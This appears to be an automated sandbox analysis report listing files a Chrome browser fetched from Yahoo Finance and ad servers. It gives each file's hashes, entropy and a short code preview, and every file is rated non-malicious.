                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.209962500721158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHaN+gDLL6:YEOB8X6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:10A3028609944F09387DEF111AE944FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:70EEF56CEC459FBDEB5B33065FC438BE986E6C89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A7B8F3B89F392024CC22D5966A07E2D07416A3AEEAE9A79D3807B22DC4AA8FB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:41FD552C60F06B8014A7340810E6E6FE592C3FB653419334EBDDD714C98FCC6FD4AAFA4111056DEF5BB4DFBB98CA18EDD1C4387939607647ABA78428A2871F37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):177670
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.792996025783776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:T2HdALSWdG78KI4NBT0pfXle5jWlYoRl96678fG5qQzbmQ:qHdALSAG78KI4NBT0L4jWlYoL9N78fG9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6DE0CCF6F32F1B6445BDB3A0B00CB987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5ED662833159C9E100647A841971DD52B739683B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3883A628FCAD29D8547482B40C0EDD023794F0087B758D1033C4F98DF09B86AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D0B258DE9AE6A0FBA0B0C88C53975376B7BF04C915E0E1E11FB5749458F0DAA8397E3592127F22D6262374E53237A32BE136324AB205727B0199C0D1B3D208A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/f10d509c/d3lm64ch1c76ug.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):51086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.36333089170413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:EoXRVtdFtXGtpfM5kT2xNGYUJmmp09VFUVdUv2dnEAxPPLaz7O3OFDN:FztNGtFMHr3wp09DOu2dnEANPLyP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AF551B67310E4C8FC63E60101C77C97F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B21E368A4F6155D50B56E0C3C0499D5D48CB4840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F9C06AD28C759B0F000F55C83EB682C66755C308EEA80E2650906A308F9F9220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:47A91E029F4EA36D1F4B277833F425ECA70C894A2187DF82F05805F73E9B16D359F4F23E21EBD7D9B342373F2F75326396B14BEF0ED08E0337197707373C9A2D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){function fe(d){var f={A1S:{log:!0,key:"_a1s"},B:{log:!1},BX:{log:!0,key:"bx"},WV:{log:!0,key:"_wv"},TT:{log:!1},D:{log:!1},_ga:{log:!0,key:"_ga"},yx:{log:!0,key:"_yx"},rxx:{log:!0,key:"_rx"},UNAUTHID:{log:!0,key:"aol_unauth"},_utd:{log:!0,key:"aol_utd",filter:function(e){e=e.match(/((?:\||^))gd#[^\|]+/g)[0].split("#")[1];return 24!==e.length&&console.warn("_utd value may be malformed"),e}},RSP_COOKIE:{log:!0,key:"aol_rsp",filter:function(e){e=e.match(/(?:(\&|^))sn=[^\&]+/g)[0].split("=")[1];return 24!==e.length&&console.warn("RSP_COOKIE value may be malformed"),e}},GUC:{log:!0,key:"_guc"},OTH:{log:!0,key:"_li",filter:function(){return"1"}}},m={},e=(this.getCookieByName=function(e){return m[e]},this.setRxx=function(e){var s=-2,t=(document.domain||"").split("."),l=t.length;function c(e){return"."+t.slice(e).join(".")}function u(){var e=c(s),t="rxx",n=m[t],i=(n||(i=(new Date).getTime()-14383872e5,n=parseInt(Math.random().toString().substring(2)).toString(36)+"."+i.toString(36)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1387)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3134380778386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:DAHWZXsvVR/fGp1CUFsRR+rdIighdIw/ErXp4O8Xb0s8yH330YjT7FOXsA:DAHlvVRnGp1CUFsRUtgPEr521df7LA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8860FFB26156A80CD6EF43CB27678F8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6263757A5038E45657418D59B9CCFFF15AA217EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C05BBFCE049CD908938C2D96D589858823D70F37CEC9AF6B5928E5AA457E64FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B70BED158E1956FA15A30EC14CB5A4E371781FABDB67A3E0FD77DB1E2E4B86022CCB013B5E85DA453D02DC7457972D90C3140EC91116D561B8CE1B09A75E88D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{l,f as L}from"./logUtil.CCV3qKPL.js";import{c as x}from"./commonUtil.BWwawKjd.js";async function E(a,{symbol:t,silent:i=!1}){var d;if(!t){const e=new Error("Bad request for loadQuoteType");return l(a,{silent:i,symbol:t},{data:e,perfLabel:"loadQuoteType"}),Promise.reject(e)}const[n]=await x(["quote"],a),r=n.getQuoteSummary(t);if(r!=null&&r.quoteType)return r.quoteType;const s=n.getQuote(t);if(s){const e=s.quoteType,o=Object(e)===e?e:s,{exchange:T,exchangeTimezoneName:q,exchangeTimezoneShortName:y,gmtOffSetMilliseconds:c,longName:g,market:h,messageBoardId:m,quoteType:Q,shortName:v,isEsgPopulated:F,sectorKey:w,industryKey:N}=o,p={exchange:T,exchangeTimezoneName:q,exchangeTimezoneShortName:y,gmtOffSetMilliseconds:c==null?void 0:c.toString(),longName:g,market:h,messageBoardId:m,quoteType:Q,shortName:v,symbol:t};if(Object.values(p).every(f=>f!==void 0)){const S=Object.entries({industryKey:N,isEsgPopulated:F,sectorKey:w}).filter(([,u])=>u!==void 0).reduce((u,[O,j])=>(u[O]=j,u),{});retu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (24044)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.520019053238329
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:bKq94ql1HP58madPeT9tnLKjXhza3N6QatV0exHP52VvDV12XT6wbEO:bKq94qjRwPYhLKVGNWueHOR10QO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:83B536BA88196A91E6A8586A168DF585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4342A1F67276A560AB9089FB26EE226377553428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:061D8F0890AAC62DB4E9EF203CD4DFFC6D5F33E9C258AACE3AE9250D8928C331
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2C7BD054EB683E666F1CDF94B0FC305E2951F6B859CDA1D28E31250FD85A6CC9128AEDF444AB214D7804CDEC0973C8A472553E2C4507D050B98A3298F1C79AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-d20b4312.292bdb8decadf75c96e0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-d20b4312.292bdb8decadf75c96e0.js.LICENSE.txt */.(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[3647],{4490:(e,t,n)=>{"use strict";n.d(t,{x:()=>a});const a=async(e,t,n)=>{const[a]=e.split("-");t.I18N.setLocale(n,e),"en"!==a&&a&&(n.internationalizer&&(n.internationalizer.hourMinute=new Intl.DateTimeFormat(e,{hour:"numeric",minute:"numeric",hour12:!0}),n.internationalizer.hourMinuteSecond=new Intl.DateTimeFormat(e,{hour:"numeric",minute:"numeric",second:"numeric",hour12:!0})),t.I18N.wordLists={[a]:await r(a)},t.I18N.setLanguage(n,a))},r=async e=>(await n(9144)(`./${e}.json`)).default},2421:(e,t,n)=>{"use strict";function a(e){if("number"!=typeof e)return"-";const t=Math.abs(e);return t>=1e15?`${(e/1e15).toFixed(2)}Q`:t>=1e12?`${(e/1e12).toFixed(2)}T`:t>=1e9?`${(e/1e9).toFixed(2)}B`:t>=1e6?`${(e/1e6).toFixed(2)}M`:t>=1e3?`${(e/1e3).toFixed(2)}K`:String(e)}n.d(t,{H:()=>a})},3734:(e,t,n)=>{"use strict";n.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2219)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.385370496130433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:N2xW2fYD/ZZzQGWrh8+r7KdqOg9KmSvJUqEj8JUqEZYs:C8rZZzlIh8u7Kd+8LUqEWUqEZYs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EEB41E47854A1AA0DB1C56E01F44BCD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DF0B6A5BD13841DAECFD8A5EC9774B419D26ED6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:46C033C47D063561B921C33DF62EF1ADBE97B92BCFF786D91C2D0DB65DA6FA8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D990801B3F88C99AF6278B83154E0D4461686F074D58A9D5FA6C786C471C7ABBE2E96D1B5047A2E304EDB94C4DC073AE8B4837C7D9BBCB8F8618F9936690126
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/cookieUtil.CNxvneMM.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a9 as b}from"./commonUtil.BWwawKjd.js";var a={},p={};/*!. * cookie. * Copyright(c) 2012-2014 Roman Shtylman. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */p.parse=T;p.serialize=O;var F=decodeURIComponent,A=encodeURIComponent,h=/; */,v=/^[\u0009\u0020-\u007e\u0080-\u00ff]+$/;function T(e,n){if(typeof e!="string")throw new TypeError("argument str must be a string");for(var r={},o=n||{},t=e.split(h),s=o.decode||F,i=0;i<t.length;i++){var f=t[i],l=f.indexOf("=");if(!(l<0)){var d=f.substr(0,l).trim(),c=f.substr(++l,f.length).trim();c[0]=='"'&&(c=c.slice(1,-1)),r[d]==null&&(r[d]=U(c,s))}}return r}function O(e,n,r){var o=r||{},t=o.encode||A;if(!v.test(e))throw new TypeError("argument name is invalid");var s=t(n);if(s&&!v.test(s))throw new TypeError("argument val is invalid");var i=e+"="+s;if(o.maxAge!=null){var f=o.maxAge-0;if(isNaN(f))throw new Error("maxAge should be a Number");i+="; Max-Age="+Math.floor(f)}if(o.domain){if(!v.test(o.domain))throw new TypeError("opt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12587)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.210319120497626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ybCNRfmZ++jS5Bn6sJ6e3TyKsGm+Ckl4RV8Bo+iDQrQMrvj4riFXEaiZDQ/2n/Jp:6C+jS5BBJ6eDyyCM4D4yDQRrvj4r3VZf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AE29A18FBC79EF7E4332EB63CB00686D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C7F777BE47B2202A25617231BF9DC59512D84778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:37DE00E89DF6A299F62130D333F26ED8DC68380802D2C18CFF1BBECB10F0D881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1E972333964CBDAA3056294ED1E4F11CFCA691D03CE2A3508F483E421244383698A39486A1425D30F85198DF415A711F4F73DDCB6A68EF20B1E60155FDD3E615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-1a02c5ac.4fd10af6e454d961cbcb.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[1037],{8762:(e,a,r)=>{var t=r(4603);var i,s;i="undefined"!=typeof window?window:r.g,(s=void 0!==t.mE?t.mE:i.CIQ).ChartEngine.prototype.addSeries=function(e,a,r){var t=this.runPrepend("addSeries",arguments);if(t)return t;var i=e||null,n=e;e||(e=s.uniqueID()),a&&!0===a.panel&&(a.panel=e);var o={parameters:a?s.clone(a):{},yValueCache:[],display:i,id:e,loading:!a||!1!==a.loadData};o.parameters.yAxis=a&&a.yAxis,(a=o.parameters).symbol&&(n=a.symbol),a.isComparison&&(a.shareYAxis=!0),!a.yAxis||a.yAxis instanceof s.ChartEngine.YAxis||(a.yAxis=new s.ChartEngine.YAxis(a.yAxis)),s.ensureDefaults(a,{chartName:this.chart.name,symbolObject:{symbol:n},panel:this.chart.panel.name,fillGaps:!1,action:"add-series"}),"display"in a&&(o.display=a.display);var l=this.charts[a.chartName],p=a.symbolObject;n=a.symbol=p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5257351171929923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUEIHh/:i4/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:13E1C7A2184E36D7AE519E99B1AA226F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:355CCAD4EAC39838E1CC76FD0B670FD2EA1E5AA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:48A33CA9F42B91902D57AD8AC52E1CE32B92C8C10C732F2DBB6FE960EBFD9438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B1A6CFA7B21DBB0B281D241AF609F3BA7F3A63E5668095BBA912BF7CFD7F0320BAF7C3B0BFABD0F8609448F39902BAEB145BA7A2D8177FE22A6FCEA03DD29BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.21109664847411
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:M/sqDmJS4RKb5ykKcvXjXRHoNcHbuHPk4FUjwAZIAdSfFE7evn:+9mc4sl3O4Cc4FIVIv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:11637EFDD5023C74A30749CDBDF996E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8D377941670A818645AAAD4008EBF2014B186050
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CD9E0584F82F63FC2424620113B1EDC4BA6AF9B27A5DEEB9140F61E1CF54B59C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:309058AFFBD9018BF35929E69FE7BE50F42EA384B3FFDF100CC4D02995ECF050CDFB122AE4C152CAC757F1B20DACF13238773F2CFB66F0CD6EF65786C7A37D12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/keyboard_arrow_down.BadFEUQj.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const w='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M7.41 8.59 12 13.17l4.59-4.58L18 10l-6 6-6-6z"/></svg>';export{w as D};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/v000/sync?userid=4f65d955-a494-43ed-8f79-94a799ece285&pn_id=b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1016)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1017
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0715765358058125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:oR1sjwHFEUwoL6yhc3XGvRqKQTZebCv531ABakHFsn+UHxvLk6L:csma66dMQK6ZebMFwJs++Tkq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F03C9FBB907E22FAF0E7BD4BE205BE49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:49DE683474BCA65C6939DE1FC3156CE161A02D31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A71BE7522F3340EF4861F7E219F28C3C27E93691931833DA985FF68A6E8A2A19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B229E8F24B52C2910DEDFA330E3320DE8FC5737006D7A4159DF1A414F8F3E8714754C4DFB1612FCE14E085B92551D001D5E3975B085090788E7D8402BDDE69C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/datetimeUtils.BKCxat1F.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function m(e,t){if(!t)return"";const n=1e3,o=60*n,s=o*60,c=s*24,l=c*31,u=l*12,a=Date.parse(t)-Date.now();let i="year",r=Math.ceil(a/u);const f=Math.abs(a);return f<o?(i="second",r=Math.ceil(a/n)):f<s?(i="minute",r=Math.ceil(a/o)):f<c?(i="hour",r=Math.ceil(a/s)):f<l?(i="day",r=Math.ceil(a/c)):f<u&&(i="month",r=Math.ceil(a/l)),e.format(r,i)}function D(e="en-US",t={}){const n=new Intl.RelativeTimeFormat(e,{numeric:"auto",style:"long",...t});return function(s){return m(n,s)}}function T(e,t="en-US",n={}){return D(t,n)(e)}function h(e){const t=new Date,n=new Date(e);return!(t.getDate()===n.getDate()&&t.getMonth()===n.getMonth()&&t.getFullYear()===n.getFullYear())}function M(){const e=new Date,t=g(e)?-4:-5;e.setHours(0,0,0,0);const n=e.getTime()+e.getTimezoneOffset()*6e4;return new Date(n+t*36e5).getTime()}function g(e){const t=new Date(e.getFullYear(),0,1).getTimezoneOffset(),n=new Date(e.getFullYear(),6,1).getTimezoneOffset();return Math.max(t,n)!==e.getTimezoneOffset()}export{M as a,T as f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5101)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5102
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.389226426471671
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:RRWcrFSbzNHhwcsmEAmPVHz6TYQAkH9Y0ykfLqEiAsgQ4183opCspW8InxHZfzvv:RDS0cXlmPVHzkAkHK0ykfLqEiATze3oU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D554568EDCCAC0FC9096BCDF76FC141E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6E50B77C732AF2BCD56F7A7F1153746EF622DE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1652D5A1C319873358E50CCB8DBC0D2490E9847CC596430FE75A0C10FA69F29B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0ECBB4934C0FC2C79BA26E20A8EB9D4E5B8B8A4F3DE975F335BBB7BDDA2A23B2678A66B62460A1E79EEBA9BDC7B319013D636EE74C04129C36D689553155E63D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/GradientScale.DbBrCr3C.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as N,e as p,d,f as y,i as m,q as u,L as v,k as L,n as M,x as D,b as k,t as R,j as w,h as W,l as g,m as z}from"./scheduler.Dsuh-FKt.js";import{e as C}from"./each.CI2tb2RB.js";import{S as H,i as j}from"./index.CvwOawEI.js";import{N as F,t as x}from"./commonUtil.BWwawKjd.js";function E(s,t){const{width:a,height:r,xOffset:n,yOffset:l}=s,e=t.reduce((_,h)=>_+h.area,0),i=r?e/r:0,o=a?e/a:0;let c=n,f=l;return t.map(_=>{const h=_;return h.coordinates={x:c,y:f},a>=r?(h.width=i,h.height=h.area/i,f=f+h.area/i):(h.width=h.area/o,h.height=o,c=c+h.area/o),h})}function G(s,t){const{width:a,height:r,xOffset:n,yOffset:l}=s;let e;const i=t.reduce((o,c)=>o+c.area,0);if(a>=r){const o=i/r,c=a-o;e={height:r,shortestEdge:Math.min(r,c),width:c,xOffset:n+o,yOffset:l}}else{const o=i/a,c=r-o;e={height:c,shortestEdge:Math.min(c,a),width:a,xOffset:n,yOffset:l+o}}return e}function V(s,t,a){const{sortField:r=""}=s;if(!r)return[];const n=s.rows.reduce((e,i)=>{var o;return e+parseFloat(((o=i[r])==null?void 0:o.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (913)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2479393821235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1n8qJGpAjGpAISr6cjaMOvM6bFu1IMBLt3CTgM94ctRD:184kur/a1k6fTgG4ct5
